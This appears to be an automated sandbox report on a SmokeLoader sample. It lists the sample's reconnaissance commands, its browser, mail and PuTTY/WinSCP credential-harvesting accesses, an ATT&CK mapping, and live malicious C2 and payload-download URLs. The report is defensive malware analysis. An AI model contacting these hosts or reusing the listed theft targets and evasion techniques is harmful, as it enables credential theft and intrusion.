    Source: C:\Windows\System32\net.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv Jump to behavior
    Source: explorer.exe, 00000001.00000000.1714214709.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1711363361.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1712382332.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000001.00000000.1711363361.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
    Source: explorer.exe, 00000001.00000000.1711363361.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000001.00000000.1711363361.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_027A55EB cpuid 13_2_027A55EB
    Source: C:\Users\user\AppData\Local\Temp\B972.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D69224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,9_2_00007FF6F2D69224
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02752198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,13_2_02752198
    Source: C:\Users\user\AppData\Local\Temp\B972.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Modifies the windows firewall
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Uses netsh to modify the Windows network and firewall settings
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: B972.exe, 00000009.00000003.3108131129.000002342E5FE000.00000004.00000020.00020000.00000000.sdmp, B972.exe, 00000009.00000003.3468731597.000002342E608000.00000004.00000020.00020000.00000000.sdmp, B972.exe, 00000009.00000003.3467979736.000002342E5FE000.00000004.00000020.00020000.00000000.sdmp, B972.exe, 00000009.00000002.4124068807.000002342E5FA000.00000004.00000020.00020000.00000000.sdmp, B972.exe, 00000009.00000003.3106981465.000002342E5F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

    Stealing of Sensitive Information

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5804, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7524, type: MEMORYSTR
    Source: Yara matchFile source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Tries to steal Mail credentials (via file / registry access)
    Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

    Remote Access Functionality

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5804, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7524, type: MEMORYSTR
    Source: Yara matchFile source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts241
    Windows Management Instrumentation    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		2
    Disable or Modify Tools    		1
    OS Credential Dumping    		1
    System Time Discovery    		Remote Services11
    Archive Collected Data    		3
    Ingress Tool Transfer    		Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts12
    Native API    		Boot or Logon Initialization Scripts522
    Process Injection    		1
    Deobfuscate/Decode Files or Information    		11
    Input Capture    		3
    File and Directory Discovery    		Remote Desktop Protocol1
    Data from Local System    		21
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution    		Logon Script (Windows)Logon Script (Windows)2
    Obfuscated Files or Information    		1
    Credentials in Registry    		249
    System Information Discovery    		SMB/Windows Admin Shares1
    Email Collection    		4
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    Command and Scripting Interpreter    		Login HookLogin Hook1
    Software Packing    		NTDS891
    Security Software Discovery    		Distributed Component Object Model11
    Input Capture    		115
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading    		LSA Secrets34
    Virtualization/Sandbox Evasion    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    File Deletion    		Cached Domain Credentials4
    Process Discovery    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
    Masquerading    		DCSync1
    Application Window Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job34
    Virtualization/Sandbox Evasion    		Proc Filesystem1
    System Network Configuration Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt522
    Process Injection    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
    Hidden Files and Directories    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528581 Sample: ctMI3TYXpX.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 58 nwgrus.ru 2->58 60 ninjahallnews.com 2->60 62 3 other IPs or domains 2->62 76 Suricata IDS alerts for network traffic 2->76 78 Found malware configuration 2->78 80 Malicious sample detected (through community Yara rule) 2->80 82 6 other signatures 2->82 11 ctMI3TYXpX.exe 2->11         started        14 jghruer 2->14         started        16 hdhruer 2->16         started        18 msiexec.exe 2->18         started        signatures3 process4 signatures5 124 Detected unpacking (changes PE section rights) 11->124 126 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->126 128 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 11->128 130 Switches to a custom stack to bypass stack traces 11->130 20 explorer.exe 68 9 11->20 injected 132 Antivirus detection for dropped file 14->132 134 Multi AV Scanner detection for dropped file 14->134 136 Machine Learning detection for dropped file 14->136 138 Maps a DLL or memory area into another process 16->138 140 Checks if the current machine is a virtual machine (disk enumeration) 16->140 142 Creates a thread in another existing process (thread injection) 16->142 process6 dnsIp7 64 nwgrus.ru 180.75.11.133, 49736, 49737, 49738 WEBE-MY-AS-APWEBEDIGITALSDNBHDMY Malaysia 20->64 66 201.103.8.135, 50062, 50064, 50066 UninetSAdeCVMX Mexico 20->66 68 2 other IPs or domains 20->68 50 C:\Users\user\AppData\Roaming\jghruer, PE32 20->50 dropped 52 C:\Users\user\AppData\Roaming\hdhruer, PE32 20->52 dropped 54 C:\Users\user\AppData\Local\Temp\B972.exe, PE32+ 20->54 dropped 56 2 other malicious files 20->56 dropped 90 System process connects to network (likely due to code injection or exploit) 20->90 92 Benign windows process drops PE files 20->92 94 Injects code into the Windows Explorer (explorer.exe) 20->94 96 3 other signatures 20->96 25 B972.exe 2 20->25         started        28 35DB.exe 20->28         started        30 explorer.exe 18 20->30         started        32 5 other processes 20->32 file8 signatures9 process10 signatures11 98 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 25->98 100 Machine Learning detection for dropped file 25->100 102 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 25->102 104 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 25->104 34 cmd.exe 1 25->34         started        106 Antivirus detection for dropped file 28->106 108 Detected unpacking (changes PE section rights) 28->108 110 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 28->110 122 4 other signatures 28->122 112 System process connects to network (likely due to code injection or exploit) 30->112 114 Found evasive API chain (may stop execution after checking mutex) 30->114 116 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 30->116 118 Tries to steal Mail credentials (via file / registry access) 30->118 120 Tries to harvest and steal browser information (history, passwords, etc) 32->120 process12 signatures13 70 Uses netsh to modify the Windows network and firewall settings 34->70 72 Uses ipconfig to lookup or modify the Windows network settings 34->72 74 Modifies the windows firewall 34->74 37 WMIC.exe 1 34->37         started        40 systeminfo.exe 34->40         started        42 net.exe 34->42         started        44 20 other processes 34->44 process14 signatures15 84 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 37->84 86 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 37->86 88 Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes) 37->88 46 net1.exe 42->46         started        48 net1.exe 44->48         started        process16

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ctMI3TYXpX.exe29%ReversingLabs
    ctMI3TYXpX.exe39%VirustotalBrowse
    ctMI3TYXpX.exe100%AviraHEUR/AGEN.1310247
    ctMI3TYXpX.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Roaming\jghruer100%AviraHEUR/AGEN.1310247
    C:\Users\user\AppData\Roaming\hdhruer100%AviraHEUR/AGEN.1310247
    C:\Users\user\AppData\Local\Temp\35DB.exe100%AviraHEUR/AGEN.1310247
    C:\Users\user\AppData\Local\Temp\B972.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\jghruer100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\hdhruer100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\35DB.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Roaming\jghruer29%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
    https://powerpoint.office.comcember0%URL Reputationsafe
    https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
    https://excel.office.com0%URL Reputationsafe
    http://schemas.micro0%URL Reputationsafe
    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
    https://word.office.com0%URL Reputationsafe
    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
    https://www.ecosia.org/newtab/0%URL Reputationsafe
    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
    https://android.notify.windows.com/iOS0%URL Reputationsafe
    https://api.msn.com/0%URL Reputationsafe
    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    		199.232.214.172
    		truefalse
      		unknown
      s-part-0017.t-0009.t-msedge.net
      		13.107.246.45
      		truefalse
        		unknown
        ninjahallnews.com
        		23.145.40.168
        		truetrue
          		unknown
          nwgrus.ru
          		180.75.11.133
          		truetrue
            		unknown
            globalviewsnature.com
            		23.145.40.113
            		truetrue
              		unknown
              fp2e7a.wpc.phicdn.net
              		192.229.221.95
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://23.145.40.164/ksa9104.exetrue
                  		unknown
                  https://ninjahallnews.com/search.phptrue
                    		unknown
                    https://fallhandbat.com/search.phptrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.miexplorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          https://duckduckgo.com/ac/?q=explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ninjahallnews.com/earch.phpexplorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://ninjahallnews.com/search.phpMozilla/5.0explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2708231092.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4124446936.0000000002847000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4124446551.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4124735208.0000000003287000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.4124374617.0000000000588000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://ninjahallnews.com/search.php(explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://excel.office.comexplorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.microexplorer.exe, 00000001.00000000.1714950006.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1713787801.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1713291422.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ninjahallnews.com:443/search.phpgeexplorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://api.msn.com/qexplorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1716416454.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1716416454.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://word.office.comexplorer.exe, 00000001.00000000.1716416454.000000000C5E6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drfalse
                                                                  		unknown
                                                                  https://ninjahallnews.com/explorer.exe, 0000000D.00000002.2750919806.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002DDC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    https://ninjahallnews.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000D.00000002.2750919806.0000000002DC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1712544792.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://schemas.micrexplorer.exe, 00000001.00000000.1712544792.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.ecosia.org/newtab/explorer.exe, 0000000D.00000003.2726426688.0000000002DC2000.00000004.00000020.00020000.00000000.sdmp, BD9E.tmp.13.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
